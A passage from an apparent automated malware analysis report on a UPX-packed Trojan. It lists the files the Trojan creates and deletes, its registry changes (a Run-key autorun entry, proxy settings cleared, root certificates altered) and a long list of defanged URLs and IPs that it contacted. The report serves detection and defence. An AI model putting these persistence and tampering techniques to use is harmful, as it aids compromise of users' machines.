C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\T0VJX29V.txt (92 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\44005FCFFDFBCF74691B1070F563009E (674 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\678B9F95B126F50368710CA85CB2F3DA_AB8D94F29896452B4806732E3EB7F2B7 (3008 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\msasys_com[1].htm (10994 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\wp[1].htm (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8F1BCG21.txt (108 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\378B079587A9184B2E2AB859CB263F40_2B618FC6CF84AEF3C14E129161BF18D9 (2674 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A (2679 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LBCCV48U.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\TW4ZIEEZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\itgsolutions_nl[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\theprintinghouseltd_co_uk[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\de-de[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3SEEZ577.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3A7IHOLU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab180E.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\domain_profile[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\0SX0GB8W.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AQNNN2UI.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dbcomponents_com[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar204.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab2A1C.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\itgsolutions_nl[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar17B0.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CMQU8KEN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\kafrit_com[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar2D3.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar2A1D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\itgsolutions_nl[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\shipeliteexpress_com[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\austriansurfing_at[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\juizi_com[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab14ED.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PAJCAVW3.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\glmghotels_com[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar14EE.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\theprintinghouseltd_co_uk[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar153E.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\6VAUSNX4.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\pferd_com[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CGMU6O9X.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\suspendedpage[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\itgsolutions_nl[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar29CD.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\bigtopmultimedia_net[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar180F.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab17AF.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HQAIFSP3.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab214.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab203.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\L27MXZYQ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\shbrazil_com[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DOTXE4DT.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\hugedomains_com[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab153D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\theprintinghouseltd_co_uk[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab29CC.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar215.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ompgp_co_jp[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\racknstackwarehouse_com_au[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\TIDXMUD3.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\glmghotels_com[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\domain_profile[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\T0VJX29V.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\taykon_com[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A7J9LGMN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab2D2.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AR7D3Y4H.txt (0 bytes)

Registry activity

The process %original file name%.exe:2624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 41 03 52 DC"

[HKLM\SOFTWARE\Microsoft\Tracing\dbbb1662e069cad25746331f4b65a05d_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\dbbb1662e069cad25746331f4b65a05d_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\dbbb1662e069cad25746331f4b65a05d_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\dbbb1662e069cad25746331f4b65a05d_RASMANCS]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\dbbb1662e069cad25746331f4b65a05d_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\323C118E1BF7B8B65254E2E2100DD6029037F096]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 02 26 C3 01"

[HKCU\Software\Microsoft\SystemCertificates\CA\Certificates\2EA71C367D178C843FD21DB4FDB630BA54A20DC5]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 2E A7 1C 36"

[HKLM\SOFTWARE\Microsoft\Tracing\dbbb1662e069cad25746331f4b65a05d_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"tebufsufeapazap" = "E9 F3 FD 7B 85 03 0D 17 94 9E A8 26 30 AD B7 C1"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"AppManagement" = "0A 6E 5F C3 28 8C F0 55 B9 1E 82 E6 4B AF 14 78"

[HKLM\SOFTWARE\Microsoft\Tracing\dbbb1662e069cad25746331f4b65a05d_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\dbbb1662e069cad25746331f4b65a05d_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 91 DE 06 25"

[HKLM\SOFTWARE\Microsoft\Tracing\dbbb1662e069cad25746331f4b65a05d_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\dbbb1662e069cad25746331f4b65a05d_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\dbbb1662e069cad25746331f4b65a05d_RASMANCS]
"EnableConsoleTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"tebufsufeapa" = "C:\Users\"%CurrentUserName%"\tebufsufeapa.exe"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"DAC9024F54D8F6DF94935FB1732638CA6AD77C13"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\SystemCertificates\CA\Certificates]
"2EA71C367D178C843FD21DB4FDB630BA54A20DC5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"323C118E1BF7B8B65254E2E2100DD6029037F096"
"2796BAE63F1801E277261BA0D77770028F20EEE4"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 45056 12288 12288 5.323 f727f0b042820d1f42a8ed7c0b1409ed
.rsrc 57344 12288 10752 3.48527 792e42cb5587f1948d869cfd9d7f9ad4

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
e6a296f5c8d9573b906787f092d962fd

URLs

URL IP
hxxp://re-wakefield.co.uk/
hxxp://cgc-england.com/
hxxp://goodvaluecenter.com/
hxxp://nazcapictures.com/
hxxp://rueggeberg.com/
hxxp://wsipowerontheweb.com/
hxxp://c21edu.com/
hxxp://colourprint.nl/
hxxp://padstow.com/
hxxp://digpro.se/ 89.221.250.11
hxxp://merceorti.com/ 80.93.92.146
hxxp://chocolatecovers.com/ 67.192.11.8
hxxp://audience-web.net/
hxxp://sztartufi.com/
hxxp://plus.ba/ 104.24.96.41
hxxp://al-mawared.com/
hxxp://berkshirebusiness.org/
hxxp://christybarry.com/ 66.49.205.161
hxxp://www.pferd.com/
hxxp://isle-karnataka.org/
hxxp://fastarchofamerica.com/
hxxp://espace-hotelier.com/
hxxp://vanguardpkg.com/
hxxp://momonophoto.com/
hxxp://orion-networks.net/
hxxp://sztartufi.com/en/
hxxp://iaiglobal.or.id/
hxxp://schiedel.it/
hxxp://brijindia.com/
hxxp://marcusgrimes.co.uk/
hxxp://HDRedirect-LB3-890977680.us-east-1.elb.amazonaws.com/
hxxp://iaiglobal.or.id/v03/
hxxp://dbcomponents.com/
hxxp://easygen.com/ 212.84.79.16
hxxp://sspackaginggroup.com/
hxxp://brookfarm.com.au/
hxxp://iaiglobal.or.id/v03/home
hxxp://toutenmeuse.com/
hxxp://telenavis.com/
hxxp://tenpole.com/
hxxp://iktus.fr/
hxxp://ctr4process.org/
hxxp://acicinvestor.ca/
hxxp://altonhousehotel.com/
hxxp://kafrit.com/
hxxp://korta-sa.com/
hxxp://lognetic.com/ 85.214.90.18
hxxp://glmghotels.com/
hxxp://slcago.org/
hxxp://atr-technologies.com/
hxxp://ajdo.net/
hxxp://geodecisions.com/
hxxp://tutuji-saitama.com/ 157.7.160.37
hxxp://austriansurfing.at/
hxxp://yamamoto-sr.com/
hxxp://nuritech.com/ 222.239.78.139
hxxp://shbrazil.com/
hxxp://cksglobal.net/
hxxp://impex.com.pl/
hxxp://www.cksglobal.net.cdn.cloudflare.net/
hxxp://eyggroup.com/
hxxp://bigtopmultimedia.com/ 104.28.6.50
hxxp://doctsf.com/
hxxp://shopping-balancer-81839464.us-west-2.elb.amazonaws.com/
hxxp://s2s.fr/
hxxp://www.doctsf.com/ 213.186.33.97
hxxp://bigtopmultimedia.net/
hxxp://cath4choice.org/
hxxp://frederickallergy.com/ 64.203.75.13
hxxp://arquiteturadigital.com/
hxxp://macgregor.co.kr/
hxxp://starmedia.ca/ 104.28.29.112
hxxp://photoclubs.com/
hxxp://agence-des-druides.com/
hxxp://egao.net/
hxxp://istanbultarim.com.tr/
hxxp://actfactory.net/ 203.183.64.166
hxxp://asterisk.com.sg/
hxxp://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEENSAj/6qJAfE5/j9OXBRE4=
hxxp://e6845.dscb1.akamaiedge.net/tj.crt
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://apps.digsigtrust.com/roots/dstrootcax3.p7c
hxxp://tavdi.com/
hxxp://solutioncorp.com/
hxxp://youjoomla.com/
hxxp://precisionsolutionsky.com/
hxxp://fujino-lab.com/ 185.26.230.130
hxxp://urantiaproject.com/
hxxp://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrJdiQ/icg9B19asFe73bPYs+reAQUdXGnGUgZvJ2d6kFH35TESHeZ03kCEFslzmkHxCZVZtM5DJmpVK0=
hxxp://mojacar-vacaciones.com/
hxxp://empordalia.com/
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR6EHhJ4XUaQA4N26wwyKpLEnXRrAQULNVQQZcVi/CPNmFbSvtr2ZnJM5ICEG6KkOvP8ESKcg0IBdCCpUQ=
hxxp://ocsp.godaddy.com.akadns.net//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== 50.63.243.230
hxxp://timeturkey.com/
hxxp://totalearthcare.com.au/
hxxp://theprintinghouseltd.co.uk/
hxxp://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf/EFWCFiRACEAoBQUIAAAFThXNqC4Xspwg=
hxxp://rodeoshow.com.au/
hxxp://stecom.nl/
hxxp://bocr.cz/
hxxp://rewardhits.com/
hxxp://coopsupermarkt.nl/ 91.205.33.139
hxxp://coop.nl/
hxxp://rea-soft.ru/
hxxp://kagu-hokuren.com/
hxxp://tvndra.net/
hxxp://kaufthal.com/ 216.222.194.171
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEBaH1oht4jAGhSM9vxG/ZZc=
hxxp://mastechn.com/
hxxp://e-kagami.com/
hxxp://woodlandhillwinery.com/
hxxp://freepatentauction.com/
hxxp://www.patentauction.com/ 87.98.255.4
hxxp://ocsp.godaddy.com.akadns.net//MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= 50.63.243.230
hxxp://www.hugedomains.com/
hxxp://a771.dscq.akamai.net//MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgPbE+K+a6P2SuOky80Zou2a1g==
hxxp://ryumachi-jp.com/
hxxp://unslp.edu.bo/ 50.28.57.22
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt
hxxp://a771.dscq.akamai.net//MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgMpdqqzEgO0NFh6jhwxp60Osw==
hxxp://shipeliteexpress.com/
hxxp://a771.dscq.akamai.net/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgOO0HAZOuLU2YD9GjtB7kQKIg==
hxxp://naijagurus.com/
hxxp://choice-select.com/
hxxp://cdn.globalsigncdn.com/rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8D4g
hxxp://safetyconnection.ca/
hxxp://graintrain.coop/
hxxp://gamblingonlinemagazine.com/ 104.28.2.40
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRvdluGAc/lYx1bXFBnllP1ugYHmAQUwk9IV/zRT5rAXTh9DgXb2S61UmACEBcIefF38d2vUUuu7Wj4bZs=
hxxp://hostphd.com.br/
hxxp://genmar.gen.tr/
hxxp://justconnect.co.za/
hxxp://juizi.com/
hxxp://servico-ind.com/
hxxp://theautospas.com/
hxxp://cbsprinting.com.au/ 104.25.65.105
hxxp://guberman.com.br/
hxxp://selldoor.pl/
hxxp://a771.dscq.akamai.net//MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgM8VK+L+sAJyPXN62OPRwOgbA==
hxxp://kvadratoff.ru/
hxxp://selldoor.pl/m/
hxxp://ocsp.godaddy.com.akadns.net//MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDH18gSiIK8Jg== 50.63.243.230
hxxp://link-list-uk.com/ 91.109.6.168
hxxp://capitalcitytuxedo.com/ 96.125.178.86
hxxp://isp-h.com/
hxxp://4pipp.com/
hxxp://stormwildlifeart.com/
hxxp://celebikalip.com.tr/
hxxp://ompgp.co.jp/
hxxp://racknstackwarehouse.com.au/
hxxp://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI=
hxxp://areafor.com/
hxxp://lexjuridica.com/ 67.210.101.185
hxxp://cdn.globalsigncdn.com/gsdomainvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBTR8bV2+e7AwQ96/HwxJKnDYl18YQQU6k581IAt5RWBhiaMgm3AmKTPlw8CDB2guvyx+pkX+CnAFA==
hxxp://myfilecenter.com/
hxxp://geothermusa.com/
hxxp://lexjuridica.com/cgi-sys/suspendedpage.cgi 67.210.101.185
hxxp://load-balancer.r-cms.jp/
hxxp://theartofhair.com/
hxxp://pcpeds.com/ 104.27.171.140
hxxp://audio-direkt.net/ 109.239.61.208
hxxp://manuyantralaya.com/
hxxp://alternative-aquitaine.co.uk/
hxxp://trinity-works.com/ 219.94.206.70
hxxp://pixemia.com/
hxxp://tessera.co.jp/
hxxp://jacksonsallamerican.com/
hxxp://niray.com.cn/
hxxp://pbna.com/
hxxp://d4drmedia.com/
hxxp://teasing-video.com/
hxxp://business-edge.com/
hxxp://denville.ca/
hxxp://gdcrl.godaddy.com.akadns.net/gdig2s1-87.crl
hxxp://meubles-jacquelin.com/
hxxp://churchsupplies.net/
hxxp://ziuabarbatului.ro/
hxxp://xing-group.com/
hxxp://topex.ro/ 89.35.6.153
hxxp://automa.it/
hxxp://upsilon89.com/
hxxp://upsilon89.com/wp
hxxp://upsilon89.com/wp/
hxxp://victoria.com.pl/
hxxp://unitedearthgroup.com/
hxxp://midwestga.com/
hxxp://bigjohnsbeefjerky.com/
hxxp://ibcd.com.br/ 198.91.95.154
hxxp://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69+Aj36pvE8hI6t7jiY7NkyMtQCEQDwHUvue3yjezwFZqwFlyRY
hxxp://a771.dscq.akamai.net/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgM/WaVueegEX1FOlwMTTOvxGQ==
hxxp://msasys.com/ 50.63.202.4
hxxp://boundbydesign.com/ 97.74.55.128
hxxp://wlf.louisiana.gov/
hxxp://meridies.org/
hxxp://perc.ca/
hxxp://a771.dscq.akamai.net//MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgP0moYiJ98Ac0H22dRrLwXjjg==
hxxp://chscreative.com/
hxxp://a771.dscq.akamai.net/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgP9tcSTUD5w2OMP5jJLv/9/qQ==
hxxp://nori-k.com/ 157.7.107.158
hxxp://eleterno.com/
hxxp://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSTufqHinruS/P9Wi1XSjRRzoTLfAQUfgNaZUFrp34K4bidCOodjh1qx2UCEQDz2s8xoGAsSX7X4SgWqX81
hxxp://acmepacificrepairs.com/
hxxp://shakeyspizza.ph/ 52.163.230.58
hxxp://hinnenwiese.de/ 85.13.146.133
hxxp://sigmametalsinc.com/ 75.119.205.155
hxxp://mastergrp-spb.ru/ 186.2.166.26
hxxp://krafthaus.com/
hxxp://shakeyspizza.ph/index.asp 52.163.230.58
hxxp://crl.comodoca.com.cdn.cloudflare.net/cPanelIncCertificationAuthority.crl
hxxp://childscope.com/
hxxp://combine.or.id/ 202.162.33.155
hxxp://nataliecurtiss.com/
hxxp://sarahdavid.com/
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ/YHKj6JjF6UBieQioTYpFsuEriQQUtnf6aUhHn1MS1cLqBzJ2B9GXBxkCEBh39mVop4K7qftC2uROM9c=
hxxp://screaminpeach.com/
hxxp://sdlp.ie/
hxxp://gpla1.wac.v2cdn.net/CRL/Omniroot2025.crl
hxxp://sarpy.com/
hxxp://eomc.net/
hxxp://westhillsstl.org/
hxxp://thedonaldsongroup.com/ 184.173.132.214
hxxp://ee-ocsp-origin.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQVTU55zB7YBNhaYi1WtGCOIGzJNQQUyqxd4ZAv8e+M1J81AeEBO6DOwXcCEH/F5wATxsli1UI2IKNKtL8=
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc=
hxxp://jeangatz.com/
hxxp://miltinio-teatras.lt/
hxxp://nichedictionary.com/ 67.196.2.201
hxxp://ixtractor.com/
hxxp://taykon.com/ 94.73.145.120
hxxp://gablemarine.com/ 104.28.14.39
hxxp://a771.dscq.akamai.net//MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgMJRuTyDL2SSO5n1lQa6eyAQw==
hxxp://cs9.wpc.v0cdn.net/pki/mscorp/crl/MSIT Machine Auth CA 2(1).crl
hxxp://shs-sales.co.uk/
hxxp://msasys.wpengine.com/
hxxp://www.ompgp.co.jp/
hxxp://ocsp2.globalsign.com/gsdomainvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBTR8bV2+e7AwQ96/HwxJKnDYl18YQQU6k581IAt5RWBhiaMgm3AmKTPlw8CDB2guvyx+pkX+CnAFA==
hxxp://www.espace-hotelier.com/
hxxp://www.alternative-aquitaine.co.uk/ 77.72.2.3
hxxp://t2.symcb.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEBaH1oht4jAGhSM9vxG/ZZc=
hxxp://ocsp.int-x3.letsencrypt.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgOO0HAZOuLU2YD9GjtB7kQKIg==
hxxp://ocsp.int-x3.letsencrypt.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgM/WaVueegEX1FOlwMTTOvxGQ==
hxxp://www.upsilon89.com/wp 213.186.33.16
hxxp://www.kafrit.com/
